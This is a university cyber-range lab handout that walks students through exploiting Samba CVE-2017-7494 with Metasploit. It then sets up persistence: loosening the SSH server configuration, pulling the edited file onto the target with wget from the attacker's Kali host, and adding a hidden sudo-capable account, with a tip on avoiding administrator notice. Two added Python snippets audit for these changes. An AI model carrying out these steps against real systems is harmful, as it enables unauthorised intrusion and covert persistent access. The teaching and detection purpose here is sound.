LAB_Exploitation
1. Overview
This exercise demonstrates the use of various Tools, Techniques, and Procedures to exploit a target host based on a
known vulnerability. I have highlighted all the commands; be sure to check for spelling or syntax errors if a command
fails. I have also marked the points at which you should insert screenshots of your output. I will use these screenshots
for grading.
2. Resources required
This exercise uses the latest Cyber Range: Cyber Basics Environment.
3. Tasks
PART 1: Exploitation
Task 1: Logon to Kali Linux
Start and join the Cyber Basics Environment. If you are asked to log in, use the username student and the password
student.
After looking at all the data gathered during the Enumeration and Vulnerability Scanning exercises, the best vulnerability
to use for an exploit is the SMB vulnerability CVE-2017-7494.
Examine the details of the Common Vulnerabilities and Exposures (CVE) at the following link:
https://www.cvedetails.com/cve/CVE-2017-7494/?q=CVE-2017-7494
From the left pane of the page, click on (1 Metasploit modules) to find information about the Metasploit Module.
©2024 Virginia Cyber Range. Created by Matthew Vogel. (CC BY-NC-SA 4.0)
1
ITN263
Term: Fall 2024
Now that we have identified a vulnerability to exploit and know the Metasploit module name, it is time to get serious.
Metasploit is a penetration testing framework that comes installed in Kali Linux. Metasploit commands are run from the
command line.
To begin, you need to start the Metasploit Framework Console (msfconsole). There are several steps to starting the
msfconsole properly.
First, start the postgresql database service. Metasploit uses this database to store information gathered during
penetration testing activities. You will need the sudo command to run this step; sudo runs a command with root-level
privileges.
Second, initialize the msf database using the msfdb init command as follows.
Finally, you can start the Metasploit Framework Console by using the msfconsole command as follows:
msfconsole
The msfconsole will start and give you the msf> prompt once the startup has been completed. While you are in the
msfconsole, regular Linux commands will no longer work.
To see a list of available commands from the msf> prompt, type a ? and press enter.
The first command you will use is the search command which will allow you to look for information on the Metasploit
exploit that you will use for this penetration test.
You can search for a CVE number or a Metasploit module name. Use the search command to look for the Metasploit
module that corresponds to the vulnerability we discovered using both the CVE number cve-2017-7494 and the name
is_known_pipename using the following commands from the msf> prompt:
search cve-2017-7494
search is_known_pipename
As you can see from the examples above, both methods of search produce the same results. The search command
shows there is an exploit, the location of the exploit, the disclosure date, the rank, and the description of the exploit.
You can now use this information to exploit the target.
Next, you will use the use command to load the exploit as follows:
use exploit/linux/samba/is_known_pipename
When using the use command, you have to use the full path as shown in the name column of the search results as in the
examples above.
The prompt will change to show the name of the exploit that was loaded. Now use the options command to see the
options for the exploit as follows:
options
If you look at the options list in the example above, the first option RHOST is blank and is required. RHOST stands for
Remote Host and is the IP address of the target system. Whenever you are attempting to exploit a target system, you
always have to provide an RHOST.
You can use the set command to set the RHOST option using the following command. The target_ip is the IP address of
the target system identified in previous exercises, the same host we used in the last enumeration lab. To find that
address, open a new terminal window and follow these steps:
route
nmap network_IP/20 (use the network you found with the route command)
Find the host with all the open ports and record its IP address here:
192.168.0.11****
Once the RHOST option is set, you can use the exploit command to launch the exploit. If the exploit fails the first time,
check that the target IP address (RHOST) is correct using the options command and run the exploit again.
If the exploit succeeds, you will get a "Command shell session 1 opened" message. This means you have successfully
executed the exploit against the target system.
Insert a screenshot of your output; it will be similar to the image below but with your specific IP
information:
[NOTE: In the sample above, the target IP address is 10.1.68.250. The IP address of the target host in your network may
be different.]
After "Command shell session 1 opened" appears, you will just have a blinking cursor and no indication that you have
entered a shell on the target system. Use the whoami command to see which account you are logged in to in the shell on
the target system, as follows:
whoami
You should see that you are the root user. Success!
You can also use the hostname command to see the target system hostname, the pwd command to see the current
directory that you are in on the target system, and the ip addr command to see the IP address of the target system.
The basic shell is a little difficult to work with as it gives you no prompt and no feedback if the command you execute
fails. You can get a more usable shell by using a Python script. Use the following command to create a more useful shell
on the target system:
This command uses the Python programming language to create a new bash shell. Bash is the default shell used in
Linux.
5. References
https://metasploit.help.rapid7.com/docs
PART 2: Post-Exploitation
Task 1: Copy the SSH server configuration from the target system
If you remember back to the enumeration phase, there is an SSH server running on the target system but it requires
cryptographic keys to log on. Since you are now the root user and have a shell on the target system, you can modify the
SSH server configuration so that you can log on with just a username and password. This will allow you to access the
system without having to exploit the vulnerability every time.
Editing the SSH server configuration file via the current shell is possible but difficult. An easier way to modify the SSH
server configuration is to copy the /etc/ssh/sshd_config file to the Kali Linux system, edit the file, and then put it back
on the target system.
On the target system via your msfconsole shell, change to the /etc/ssh/ directory using the cd command as follows:
cd /etc/ssh/
cat sshd_config
On your Kali Linux system, open a new terminal window and create a new directory named sshd in the student home
directory as shown below. This directory will hold the sshd_config file that you copy from the target system. The ~/ in
the following command means the home directory of the current user:
mkdir ~/sshd
On your Kali Linux system, open the Mousepad text editor by going to Applications in the top left-hand corner of the
desktop, typing Mousepad into the search bar, and selecting Mousepad from the list of apps.
Copy and paste the sshd_config file from the shell on the target system into the text editor on your Kali Linux system.
Make sure you get the entire file starting with line # $OpenBSD: sshd_config and going to the last line # ForceCommand
cvs server. When copying the text from a terminal window, you have to highlight the text and then select Edit and Copy
from the menu at the top of the terminal window.
You can now paste the copied text into the Mousepad application.
Edit the sshd_config file in the Mousepad application to allow password authentication and interactive password
request/response. Change:
PasswordAuthentication no
to
PasswordAuthentication yes
and change:
ChallengeResponseAuthentication no
to
ChallengeResponseAuthentication yes
Save the file and name it sshd_config and place it in the sshd folder you just created on your Kali Linux system. When
you select File and Save in the Mousepad application, the default location will be the student home folder. You will
have to select the sshd folder.
On the Kali Linux system in a terminal window, change to the new sshd directory you created as follows:
cd ~/sshd
On the Kali Linux system, use the ls command to verify the sshd_config file is present.
Now you have to get the file back to the target system, but you cannot copy and paste it back to the target system.
Luckily there is a way to use Python to put the file back. Python 2 ships a module, SimpleHTTPServer, that can start a
simple HTTP web server in any directory on a Linux system. The SimpleHTTPServer module serves a webpage that makes the
files in the directory where the server was started accessible via HTTP. You can then download any file located in the
directory where the SimpleHTTPServer is running.
Make sure you are in the sshd directory on your Kali Linux system as follows:
cd ~/sshd
Start the SimpleHTTPServer on port 8000 on your Kali Linux system using the command shown below. Web servers
normally use port 80; however, it is recommended that you use a different port to avoid conflicts with any other
service that may be running on your Kali Linux system. The -m option tells Python to run a module, in this case
SimpleHTTPServer. Kali Linux has both Python version 2 and version 3 installed. SimpleHTTPServer is a Python 2 module,
so we will use that Python version here.
Test the SimpleHTTPServer with a web browser in Kali Linux by going to http://127.0.0.1:8000. Verify that the
sshd_config file is listed on the webpage. The 127.0.0.1 IP address is the loopback address for your Kali Linux system.
On the target system via your msfconsole shell, change to the /etc/ssh directory as follows:
cd /etc/ssh
On the target system via your msfconsole shell, move the current sshd_config file to sshd_config_old to make way for
the newly edited file. You should always rename files when replacing them so you can revert to the original file by just
changing the name back. If you overwrite the file, it will be gone for good. To rename a file in Linux, you use the mv
command, which stands for move.
mv sshd_config sshd_config_old
On the target system via your msfconsole shell, use the wget command to get the new sshd_config file from your Kali
Linux system via HTTP. If you do not know the IP address of your Kali Linux system, use the ip addr command to find the
IP address. Be sure to replace kali_linux_ip with the IP address of your Kali Linux system. Wget is a command line HTTP
client that can download files from an HTTP server.
wget kali_linux_ip:8000/sshd_config
On the target system via your msfconsole shell, use the ls command to verify that the sshd_config file has been
downloaded as follows:
ls sshd_config
Now that you have the new and improved sshd_config file in place, you need to restart the sshd service on the target
system via your msfconsole shell as follows:
Now the SSH server on the victim system should allow a username and password.
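The two directives changed above are exactly what a defender should be auditing for. The following is an added example, not part of the lab or of any tool it uses: it reads an sshd_config the way sshd does (first occurrence of a keyword wins, comments ignored, keywords case-insensitive) and reports authentication settings that have been loosened, plus leftover copies such as the sshd_config_old created in this part. The expected values and the sample configs are constructed assumptions.

```python
import re
from typing import Dict, List

# Authentication directives this lab flips from "no" to "yes"; on a
# key-only SSH server they should stay "no".
EXPECTED = {
    "passwordauthentication": "no",
    "challengeresponseauthentication": "no",
}

def parse_sshd_config(text: str) -> Dict[str, str]:
    """Effective keyword -> value using sshd's rules: keywords are case-
    insensitive, '#' starts a comment, the FIRST occurrence of a keyword
    wins, and parsing stops at a Match block (everything after it is conditional)."""
    effective: Dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = re.split(r"[\s=]+", line, maxsplit=1)
        if len(parts) != 2:
            continue
        key, value = parts[0].lower(), parts[1].strip()
        if key == "match":
            break
        effective.setdefault(key, value)
    return effective

def audit_sshd_config(text: str) -> List[str]:
    """Findings for directives that are missing or weaker than EXPECTED."""
    eff = parse_sshd_config(text)
    findings = []
    for key, want in EXPECTED.items():
        got = eff.get(key)
        if got is None:
            findings.append(f"{key}: not set (sshd default applies)")
        elif got.lower() != want:
            findings.append(f"{key}: is '{got}', expected '{want}'")
    return findings

def stray_config_copies(listing: List[str]) -> List[str]:
    """Extra sshd_config copies in /etc/ssh, e.g. the sshd_config_old left after a swap."""
    return sorted(n for n in listing if n.startswith("sshd_config")
                  and n not in ("sshd_config", "sshd_config.d"))

# Constructed samples (not from a real host): a hardened file and the lab's edited one.
HARDENED = "Port 22\n#PasswordAuthentication yes\nPasswordAuthentication no\nChallengeResponseAuthentication no\n"
WEAKENED = "Port 22\nPasswordAuthentication yes\nChallengeResponseAuthentication yes\n"
if __name__ == "__main__":
    print(audit_sshd_config(WEAKENED), stray_config_copies(["sshd_config", "sshd_config_old", "ssh_host_rsa_key"]))
```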
The question now is which username and password you should use to log in. You have root-level access but do not
know the root password and do not want to change the root password. Changing the root password may alert system
administrators when the root password no longer works for them.
On the target system via your msfconsole shell, use the adduser command as follows to add a new user to the victim
system, then set the password using the passwd command. In the example below, the username is yourname; be sure to
put your actual first name instead of 'yourname'.
adduser yourname
passwd yourname
You will also need to add the new user to the sudo group with the usermod command so the user can execute
commands as root as follows:
On the Kali Linux system, in the terminal window running the SimpleHTTPServer, press CTRL + C to return to the prompt.
Then use the new account you created on the target system to SSH into the target system from your Kali system. You will
need the password you set for the new user. Be sure to replace target_system_ip with the IP address of your target system.
ssh yourname@target_system_ip
On the target system via your SSH shell, test that sudo access works for the new account as follows:
cd ~
sudo echo test > testfile
ls testfile
You should see a file named testfile if your use of sudo was successful. Note that the redirection is performed by your
own, unprivileged shell rather than by sudo, so also watch for a sudo error or password prompt when the command runs.
You are now able to access the target system at will without having to exploit the vulnerability. Even if the vulnerability
is patched, you will have access to the target system with your new user account via SSH.
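The persistence just established leaves two durable artifacts that a defender can audit: a new interactive account and an extra member of the sudo group. The following is an added example, not part of the lab: it parses /etc/passwd and /etc/group text, resolves sudo membership through both the supplementary member list and a primary GID, and reports accounts outside an approved baseline. The sample files and the baseline set are constructed assumptions.

```python
from typing import Dict, List, Set
# Constructed sample files (not from a real host): an approved admin and an
# account added the way this lab does it (adduser, then added to the sudo group).
PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
admin:x:1000:1000:Site Admin:/home/admin:/bin/bash
yourname:x:1001:1001:,,,:/home/yourname:/bin/bash
"""
GROUP = """\
sudo:x:27:admin,yourname
yourname:x:1001:
"""
def parse_passwd(text: str) -> Dict[str, dict]:
    """Map user -> {uid, gid, shell} from /etc/passwd text."""
    users = {}
    for line in text.splitlines():
        f = line.split(":")
        if len(f) == 7 and not line.startswith("#"):
            users[f[0]] = {"uid": int(f[2]), "gid": int(f[3]), "shell": f[6]}
    return users

def parse_group(text: str) -> Dict[str, dict]:
    """Map group -> {gid, members} from /etc/group text."""
    groups = {}
    for line in text.splitlines():
        f = line.split(":")
        if len(f) == 4 and not line.startswith("#"):
            groups[f[0]] = {"gid": int(f[2]), "members": {m for m in f[3].split(",") if m}}
    return groups

def sudo_members(passwd_text: str, group_text: str, group: str = "sudo") -> Set[str]:
    """Accounts in the sudo group, whether listed as supplementary members in
    /etc/group or carrying its GID as primary GID in /etc/passwd (easy to miss)."""
    users, groups = parse_passwd(passwd_text), parse_group(group_text)
    g = groups.get(group)
    if g is None:
        return set()
    return set(g["members"]) | {u for u, i in users.items() if i["gid"] == g["gid"]}

def unexpected_sudoers(passwd_text: str, group_text: str, known: Set[str]) -> List[str]:
    """Sudo-capable accounts that are not on the approved list, sorted for reporting."""
    return sorted(sudo_members(passwd_text, group_text) - known)

def new_interactive_accounts(passwd_text: str, known: Set[str]) -> List[str]:
    """Regular (UID >= 1000) accounts with a login shell that are not in the baseline."""
    return sorted(u for u, i in parse_passwd(passwd_text).items()
                  if i["uid"] >= 1000 and not i["shell"].endswith("nologin") and u not in known)
if __name__ == "__main__":
    print(unexpected_sudoers(PASSWD, GROUP, {"admin"}), new_interactive_accounts(PASSWD, {"admin"}))
```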
5. References
https://metasploit.help.rapid7.com/docs
https://www.kali.org/kali-linux-documentation/
https://www.ssh.com/ssh/command/
This exercise is designed to use the latest Cyber Range Cyber Basics Environment. All students will have to register for
an account to access the Cyber Range. The instructor will have to create a class and add the Cyber Basics Environment
for the students to be able to use.
The grading for this exercise is based on the output provided by the students. Each student’s environment will be a little
different so there is no master answer key. Students should be encouraged to document their work via a Penetration
Testing Log which they can turn in for grading. The log can be done in any word processing application and should
contain a list of tasks completed, commands run for each task, screenshots of the output from each task, and any issues
encountered during the exercise. The instructor should review the log to ensure that the students are mastering the
appropriate skills.
For this exercise, the students should document all of the steps that they took to gain persistent access to the target
system and any issues they encountered.